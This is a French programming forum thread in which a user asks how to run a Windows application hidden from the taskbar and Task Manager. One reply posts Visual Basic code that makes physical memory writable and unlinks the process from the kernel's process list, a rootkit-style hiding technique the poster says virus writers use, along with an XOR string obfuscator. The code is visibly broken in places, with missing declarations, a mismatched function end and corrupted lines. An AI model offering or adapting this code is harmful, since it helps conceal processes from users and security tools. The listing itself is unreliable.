yomgui75
Messages postés7Date d'inscriptionmardi 19 avril 2005StatutMembreDernière intervention25 avril 2005
-
19 avril 2005 à 22:51
blooddity
Messages postés1Date d'inscriptionlundi 8 mai 2006StatutMembreDernière intervention 1 mai 2008
-
1 mai 2008 à 05:42
Salut à tous,
Je cherche le moyen de démarrer une application windows dès l'ouverture d'une session (à priori pas de prb en la mettant dans le menu démarrer), et surtout de la cacher à l'utilisateur pendant toute la durée de la session.
Il faudrait que l'application en question, n'apparaisse ni dans la barre des taches de windows, ni dans la fenetre principale de windows... Idéalement, elle n'apparait pas non plus dans le gestionnaire des taches.
J'ai chercher sur internet, il y a des freeware qui font ca... Ce sont des sorte de dipositif anti panique....
A priori ca doit être modifiable avec du vb, en utilisant les API je pense... mais comme je n'y connais pas grand chose, je pose ma question sur le forum à tout hasard.
Merci d'avance à tous les grands développeur qui se pencheront sur cette question.
a+
crenaud76
Messages postés4172Date d'inscriptionmercredi 30 juillet 2003StatutMembreDernière intervention 9 juin 200628 20 avril 2005 à 09:27
A ma connaissance il est impossible de masquer totalement un processus (entre autre dans le gestionnaire de tâche). Si c'était le cas, je pense que les petits cons de developpeurs de Virus aurait employé cette technique depuis longtemps, ce qui n'est pas le cas, à ma connaissance.
Et puis quel est l'intéret de cacher ton appli du gestionnaire des taches ? tu veux faire un virus ... Si oui, tu sais ce que je pense de toi ...
yomgui75
Messages postés7Date d'inscriptionmardi 19 avril 2005StatutMembreDernière intervention25 avril 2005 20 avril 2005 à 09:40
Je comprends que la question puisse soulever ce type d'interrogation.
Tout d'abord pour bien situer la situation, je ne suis pas développeur... je suis donc à 100 lieux de vouloir créer un virus.
Ensuite, pour détailler le pourquoi de ma demande, voici la situation:
J'ai un produit qui se décompose en un client lourd (l'application) et une partie web... La partie web est tellement spécifique, qu'elle fait appelle à des fonction sur le poste de l'utilisateur.
Prob: le site web ne fonctionne pas sans que le client lourd soit lancer sur les poste. Hors, le client lourd permet de faire certaines choses dont on ne veux pas que les utilisateurs ai accès...
L'idée était donc de lancer le client lourd en tache de fond (un peu comme un service) que l'utilisateur n'ira pas éteindre parce qu'il ne sait pas à quoi ca correspond!
Voila le pourquoi de ma question.
A priori j'ai trouver une piste sur ce site...
Un code de Jeff007 qui permet de cacher les appli au lancement:
<<
Option Explicit
Sub Main()
On Error Resume Next
Dim dummy
dummy = Shell(Command$, vbHide)
End
End Sub
>>
Par contre, je ne sais pas comment le compiler... parce que je ne connais vraiment pas le VB
elguevel
Messages postés718Date d'inscriptionjeudi 19 décembre 2002StatutMembreDernière intervention22 novembre 20163 6 oct. 2005 à 10:08
Pour repondre à crenaud76 si on peut cacher des process du gestionnaire de tache, et si des editeurs de virus utilise déja cette technique !!! ( J'ai deja vu çà )
Private Type OBJECT_ATTRIBUTES
Length As Long
RootDirectory As Long
ObjectName As Long
Attributes As Long
SecurityDeor As Long
SecurityQualityOfService As Long
End Type
Private Type ACL
AclRevision As Byte
Sbz1 As Byte
AclSize As Integer
AceCount As Integer
Sbz2 As Integer
End Type
Private Enum MULTIPLE_TRUSTEE_OPERATION
NO_MULTIPLE_TRUSTEE
TRUSTEE_IS_IMPERSONATE
End Enum
Private Enum TRUSTEE_FORM
TRUSTEE_IS_SID
TRUSTEE_IS_NAME
End Enum
Private Enum TRUSTEE_TYPE
TRUSTEE_IS_UNKNOWN
TRUSTEE_IS_USER
TRUSTEE_IS_GROUP
End Enum
Private Type TRUSTEE
pMultipleTrustee As Long
MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
TrusteeForm As TRUSTEE_FORM
TrusteeType As TRUSTEE_TYPE
ptstrName As String
End Type
Private Type EXPLICIT_ACCESS
grfAccessPermissions As Long
grfAccessMode As ACCESS_MODE
grfInheritance As Long
TRUSTEE As TRUSTEE
End Type
Private Type AceArray
List() As EXPLICIT_ACCESS
End Type
Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As Long
Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)
Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)
Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long
Private Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type
Private verinfo As OSVERSIONINFO
Private g_hNtDLL As Long
Private g_pMapPhysicalMemory As Long
Private g_hMPM As Long
Private aByte(3) As Byte
Public Sub HideCurrentProcess()
'ÔÚœø³ÌÁбíÖÐÒþ²Øµ±Ç°ÓŠÓóÌÐòœø³Ì
Dim thread As Long, process As Long, fw As Long, bw As Long
Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long
verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) <> 0 Then
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
Select Case verinfo.dwMinorVersion
Case 0
lOffsetFlink = &HA0
lOffsetBlink = &HA4
lOffsetPID = &H9C
Case 1
lOffsetFlink = &H88
lOffsetBlink = &H8C
lOffsetPID = &H84
End Select
End If
End If
End If
If OpenPhysicalMemory <> 0 Then
thread = GetData(&HFFDFF124)
process = GetData(thread + &H44)
fw = GetData(process + lOffsetFlink)
bw = GetData(process + lOffsetBlink)
SetData fw + 4, bw
SetData bw, fw
CloseHandle g_hMPM
End If
End Sub
Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
Dim pDacl As Long
Dim pNewDacl As Long
Dim pSD As Long
Dim dwRes As Long
Dim ea As EXPLICIT_ACCESS
Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
If Status = STATUS_ACCESS_DENIED Then
Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes)
SetPhyscialMemorySectionCanBeWrited g_hMPM
CloseHandle g_hMPM
Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
End If
Dim lDirectoty As Long
verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) <> 0 Then
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
Select Case verinfo.dwMinorVersion
Case 0
lDirectoty = &H30000
Case 1
lDirectoty = &H39000
End Select
End If
End If
End If
If Status = 0 Then
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000)
If g_pMapPhysicalMemory <> 0 Then OpenPhysicalMemory = g_hMPM
End If
End Function
Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long
Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
Dim lTemp As Long
If (PGDE And 1) <> 0 Then
lTemp = PGDE And &H80
If lTemp <> 0 Then
PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)
Else
PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000)
lTemp = (VAddr And &H3FF000) / (2 ^ 12)
PTE = PGDE + lTemp * 4
CopyMemory PTE, ByVal PTE, 4
If (PTE And 1) <> 0 Then
PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)
UnmapViewOfFile PGDE
End If
End If
End If
LinearToPhys = PAddr
End Function
Private Function GetData(addr As Long) As Long
Dim phys As Long, tmp As Long, Ret As Long
phys = LinearToPhys(g_pMapPhysicalMemory, addr)
tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000)
If tmp <> 0 Then
Ret = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
CopyMemory Ret, ByVal Ret, 4
UnmapViewOfFile tmp
GetData = Ret
End If
End Function
Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
Dim phys As Long, tmp As Long, x As Long
phys = LinearToPhys(g_pMapPhysicalMemory, addr)
tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000)
If tmp <> 0 Then
x = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
CopyMemory ByVal x, data, 4
UnmapViewOfFile tmp
SetData = True
End If
End Function
Private Function ByteArrToLong(inByte() As Byte) As Double
Dim i As Integer
For i = 0 To 3
ByteArrToLong = ByteArrToLong + inByte(i) * (&H100 ^ i)
Next i
End Function
Function encdec(inputstrinG As String) As String
If Len(inputstrinG) = 0 Then Exit Function
Dim p As String, o As String, k As String, s As String, tempstr As String, i As Integer, g As Integer
g = 1
For i = 1 To Len(inputstrinG)
p = Mid$(inputstrinG, i, 1)
o = Asc(p)
k = o Xor g
s = Chr$(k)
tempstr = tempstr & sIf g 255 Then g 1 Else g = g + 1
Next i
encdec = tempstr
End Function